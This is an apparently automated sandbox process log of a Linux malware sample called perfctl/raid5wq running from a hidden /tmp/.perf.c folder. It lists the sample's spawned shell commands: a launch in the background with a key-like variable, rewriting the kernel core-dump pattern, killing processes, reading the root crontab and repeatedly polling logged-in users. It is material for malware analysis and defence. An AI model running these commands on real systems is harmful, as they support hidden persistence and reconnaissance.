Analysis Process: sh PID: 6599, Parent PID: 6269

General

Start time (UTC):	11:01:57
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "echo '/etc/coredumps/%e.%p.%u.%t' > /proc/sys/kernel/core_pattern"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: raid5wq PID: 6600, Parent PID: 6269

General

Start time (UTC):	11:01:57
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6600, Parent PID: 6269

General

Start time (UTC):	11:01:57
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6601, Parent PID: 6600

General

Start time (UTC):	11:01:58
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6601, Parent PID: 6600

General

Start time (UTC):	11:01:58
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6602, Parent PID: 6600

General

Start time (UTC):	11:01:58
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6602, Parent PID: 6600

General

Start time (UTC):	11:01:58
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6605, Parent PID: 6269

General

Start time (UTC):	11:01:59
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6605, Parent PID: 6269

General

Start time (UTC):	11:01:59
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6606, Parent PID: 6605

General

Start time (UTC):	11:01:59
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6606, Parent PID: 6605

General

Start time (UTC):	11:01:59
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6607, Parent PID: 6605

General

Start time (UTC):	11:01:59
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6607, Parent PID: 6605

General

Start time (UTC):	11:01:59
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6608, Parent PID: 6269

General

Start time (UTC):	11:02:01
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6608, Parent PID: 6269

General

Start time (UTC):	11:02:01
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6609, Parent PID: 6608

General

Start time (UTC):	11:02:02
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6609, Parent PID: 6608

General

Start time (UTC):	11:02:02
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6610, Parent PID: 6608

General

Start time (UTC):	11:02:02
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6610, Parent PID: 6608

General

Start time (UTC):	11:02:02
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6613, Parent PID: 6269

General

Start time (UTC):	11:02:03
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6613, Parent PID: 6269

General

Start time (UTC):	11:02:03
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "PATH=/tmp/.perf.c:$PATH;export AAPCRK=c1cH3IVckE39;nohup perfctl >/dev/null 2>/dev/null & exit"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6616, Parent PID: 6613

General

Start time (UTC):	11:02:03
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: nohup PID: 6616, Parent PID: 1860

General

Start time (UTC):	11:02:03
Start date (UTC):	10/10/2024
Path:	/usr/bin/nohup
Arguments:	nohup perfctl
File size:	43352 bytes
MD5 hash:	d8d3ce4d7f4b1e3ac3c3e7c9790f22ca

Analysis Process: perfctl PID: 6616, Parent PID: 1860

General

Start time (UTC):	11:02:03
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/perfctl
Arguments:	perfctl
File size:	1727132 bytes
MD5 hash:	6e7230dbe35df5b46dcd08975a0cc87f

Analysis Process: perfctl PID: 6620, Parent PID: 6616

General

Start time (UTC):	11:02:05
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/perfctl
Arguments:	-
File size:	1727132 bytes
MD5 hash:	6e7230dbe35df5b46dcd08975a0cc87f

Analysis Process: raid5wq PID: 6617, Parent PID: 6269

General

Start time (UTC):	11:02:03
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6617, Parent PID: 6269

General

Start time (UTC):	11:02:03
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6618, Parent PID: 6617

General

Start time (UTC):	11:02:04
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6618, Parent PID: 6617

General

Start time (UTC):	11:02:04
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6619, Parent PID: 6617

General

Start time (UTC):	11:02:04
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6619, Parent PID: 6617

General

Start time (UTC):	11:02:04
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6626, Parent PID: 6269

General

Start time (UTC):	11:02:05
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6626, Parent PID: 6269

General

Start time (UTC):	11:02:05
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6627, Parent PID: 6626

General

Start time (UTC):	11:02:06
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6627, Parent PID: 6626

General

Start time (UTC):	11:02:06
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6628, Parent PID: 6626

General

Start time (UTC):	11:02:06
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6628, Parent PID: 6626

General

Start time (UTC):	11:02:06
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6630, Parent PID: 6269

General

Start time (UTC):	11:02:07
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6630, Parent PID: 6269

General

Start time (UTC):	11:02:07
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "ps -ax\|grep perfctl\|grep -v grep\|awk '{print $1}'\|xargs kill -9"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6631, Parent PID: 6630

General

Start time (UTC):	11:02:07
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: ps PID: 6631, Parent PID: 6630

General

Start time (UTC):	11:02:07
Start date (UTC):	10/10/2024
Path:	/usr/bin/ps
Arguments:	ps -ax
File size:	137688 bytes
MD5 hash:	ab48054475a6f70f8e7fa847331f3327

Analysis Process: sh PID: 6632, Parent PID: 6630

General

Start time (UTC):	11:02:07
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: grep PID: 6632, Parent PID: 6630

General

Start time (UTC):	11:02:07
Start date (UTC):	10/10/2024
Path:	/usr/bin/grep
Arguments:	grep perfctl
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Analysis Process: sh PID: 6633, Parent PID: 6630

General

Start time (UTC):	11:02:07
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: grep PID: 6633, Parent PID: 6630

General

Start time (UTC):	11:02:07
Start date (UTC):	10/10/2024
Path:	/usr/bin/grep
Arguments:	grep -v grep
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Analysis Process: sh PID: 6634, Parent PID: 6630

General

Start time (UTC):	11:02:07
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: awk PID: 6634, Parent PID: 6630

General

Start time (UTC):	11:02:07
Start date (UTC):	10/10/2024
Path:	/usr/bin/awk
Arguments:	awk "{print $1}"
File size:	711136 bytes
MD5 hash:	7e9b2ed1272331cfbd2aac2e5eb3f84b

Analysis Process: sh PID: 6635, Parent PID: 6630

General

Start time (UTC):	11:02:07
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: xargs PID: 6635, Parent PID: 6630

General

Start time (UTC):	11:02:07
Start date (UTC):	10/10/2024
Path:	/usr/bin/xargs
Arguments:	xargs kill -9
File size:	76152 bytes
MD5 hash:	67d30da7ca6e766bb5a005e77f928efb

Analysis Process: xargs PID: 6699, Parent PID: 6635

General

Start time (UTC):	11:02:27
Start date (UTC):	10/10/2024
Path:	/usr/bin/xargs
Arguments:	-
File size:	76152 bytes
MD5 hash:	67d30da7ca6e766bb5a005e77f928efb

Analysis Process: kill PID: 6699, Parent PID: 6635

General

Start time (UTC):	11:02:27
Start date (UTC):	10/10/2024
Path:	/usr/bin/kill
Arguments:	kill -9 6620
File size:	30952 bytes
MD5 hash:	40c0f12bde854853f4eed7cd18e097a0

Analysis Process: raid5wq PID: 6636, Parent PID: 6269

General

Start time (UTC):	11:02:07
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6636, Parent PID: 6269

General

Start time (UTC):	11:02:07
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6639, Parent PID: 6636

General

Start time (UTC):	11:02:08
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6639, Parent PID: 6636

General

Start time (UTC):	11:02:08
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6640, Parent PID: 6636

General

Start time (UTC):	11:02:08
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6640, Parent PID: 6636

General

Start time (UTC):	11:02:08
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6641, Parent PID: 6269

General

Start time (UTC):	11:02:09
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6641, Parent PID: 6269

General

Start time (UTC):	11:02:09
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6642, Parent PID: 6641

General

Start time (UTC):	11:02:10
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6642, Parent PID: 6641

General

Start time (UTC):	11:02:10
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6643, Parent PID: 6641

General

Start time (UTC):	11:02:10
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6643, Parent PID: 6641

General

Start time (UTC):	11:02:10
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6645, Parent PID: 6269

General

Start time (UTC):	11:02:11
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6645, Parent PID: 6269

General

Start time (UTC):	11:02:11
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6646, Parent PID: 6645

General

Start time (UTC):	11:02:12
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6646, Parent PID: 6645

General

Start time (UTC):	11:02:12
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6647, Parent PID: 6645

General

Start time (UTC):	11:02:12
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6647, Parent PID: 6645

General

Start time (UTC):	11:02:12
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6650, Parent PID: 6269

General

Start time (UTC):	11:02:14
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6650, Parent PID: 6269

General

Start time (UTC):	11:02:14
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6651, Parent PID: 6650

General

Start time (UTC):	11:02:14
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6651, Parent PID: 6650

General

Start time (UTC):	11:02:14
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6652, Parent PID: 6650

General

Start time (UTC):	11:02:14
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6652, Parent PID: 6650

General

Start time (UTC):	11:02:14
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6653, Parent PID: 6269

General

Start time (UTC):	11:02:16
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6653, Parent PID: 6269

General

Start time (UTC):	11:02:16
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6654, Parent PID: 6653

General

Start time (UTC):	11:02:17
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6654, Parent PID: 6653

General

Start time (UTC):	11:02:17
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6655, Parent PID: 6653

General

Start time (UTC):	11:02:17
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6655, Parent PID: 6653

General

Start time (UTC):	11:02:17
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6658, Parent PID: 6269

General

Start time (UTC):	11:02:18
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6658, Parent PID: 6269

General

Start time (UTC):	11:02:18
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "find /var/spool/cron/crontabs -type f 2>/dev/null\|grep cron\|grep '/root$'\|xargs cat"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6659, Parent PID: 6658

General

Start time (UTC):	11:02:18
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: find PID: 6659, Parent PID: 6658

General

Start time (UTC):	11:02:18
Start date (UTC):	10/10/2024
Path:	/usr/bin/find
Arguments:	find /var/spool/cron/crontabs -type f
File size:	320160 bytes
MD5 hash:	b68ef002f84cc54dd472238ba7df80ab

Analysis Process: sh PID: 6660, Parent PID: 6658

General

Start time (UTC):	11:02:18
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: grep PID: 6660, Parent PID: 6658

General

Start time (UTC):	11:02:18
Start date (UTC):	10/10/2024
Path:	/usr/bin/grep
Arguments:	grep cron
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Analysis Process: sh PID: 6661, Parent PID: 6658

General

Start time (UTC):	11:02:18
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: grep PID: 6661, Parent PID: 6658

General

Start time (UTC):	11:02:18
Start date (UTC):	10/10/2024
Path:	/usr/bin/grep
Arguments:	grep /root$
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Analysis Process: sh PID: 6662, Parent PID: 6658

General

Start time (UTC):	11:02:18
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: xargs PID: 6662, Parent PID: 6658

General

Start time (UTC):	11:02:18
Start date (UTC):	10/10/2024
Path:	/usr/bin/xargs
Arguments:	xargs cat
File size:	76152 bytes
MD5 hash:	67d30da7ca6e766bb5a005e77f928efb

Analysis Process: xargs PID: 6666, Parent PID: 6662

General

Start time (UTC):	11:02:19
Start date (UTC):	10/10/2024
Path:	/usr/bin/xargs
Arguments:	-
File size:	76152 bytes
MD5 hash:	67d30da7ca6e766bb5a005e77f928efb

Analysis Process: cat PID: 6666, Parent PID: 6662

General

Start time (UTC):	11:02:20
Start date (UTC):	10/10/2024
Path:	/usr/bin/cat
Arguments:	cat /var/spool/cron/crontabs/root
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Analysis Process: raid5wq PID: 6663, Parent PID: 6269

General

Start time (UTC):	11:02:19
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6663, Parent PID: 6269

General

Start time (UTC):	11:02:19
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6664, Parent PID: 6663

General

Start time (UTC):	11:02:19
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6664, Parent PID: 6663

General

Start time (UTC):	11:02:19
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6665, Parent PID: 6663

General

Start time (UTC):	11:02:19
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6665, Parent PID: 6663

General

Start time (UTC):	11:02:19
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6669, Parent PID: 6269

General

Start time (UTC):	11:02:20
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6669, Parent PID: 6269

General

Start time (UTC):	11:02:20
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "echo '/etc/coredumps/%e.%p.%u.%t' > /proc/sys/kernel/core_pattern"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: raid5wq PID: 6674, Parent PID: 6269

General

Start time (UTC):	11:02:21
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6674, Parent PID: 6269

General

Start time (UTC):	11:02:21
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6675, Parent PID: 6674

General

Start time (UTC):	11:02:21
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6675, Parent PID: 6674

General

Start time (UTC):	11:02:21
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6676, Parent PID: 6674

General

Start time (UTC):	11:02:21
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6676, Parent PID: 6674

General

Start time (UTC):	11:02:21
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6679, Parent PID: 6269

General

Start time (UTC):	11:02:23
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6679, Parent PID: 6269

General

Start time (UTC):	11:02:23
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6680, Parent PID: 6679

General

Start time (UTC):	11:02:24
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6680, Parent PID: 6679

General

Start time (UTC):	11:02:24
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
Arguments:	who
File size:	59768 bytes
MD5 hash:	04e03e21fed4071259c4427b3baf5e8f

Analysis Process: sh PID: 6681, Parent PID: 6679

General

Start time (UTC):	11:02:24
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: wc PID: 6681, Parent PID: 6679

General

Start time (UTC):	11:02:24
Start date (UTC):	10/10/2024
Path:	/usr/bin/wc
Arguments:	wc -l
File size:	47456 bytes
MD5 hash:	2f44ec9941b5797742ec082e424af073

Analysis Process: raid5wq PID: 6689, Parent PID: 6269

General

Start time (UTC):	11:02:25
Start date (UTC):	10/10/2024
Path:	/tmp/.perf.c/raid5wq
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Analysis Process: sh PID: 6689, Parent PID: 6269

General

Start time (UTC):	11:02:25
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "who \| wc -l"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6692, Parent PID: 6689

General

Start time (UTC):	11:02:25
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: who PID: 6692, Parent PID: 6689

General

Start time (UTC):	11:02:25
Start date (UTC):	10/10/2024
Path:	/usr/bin/who
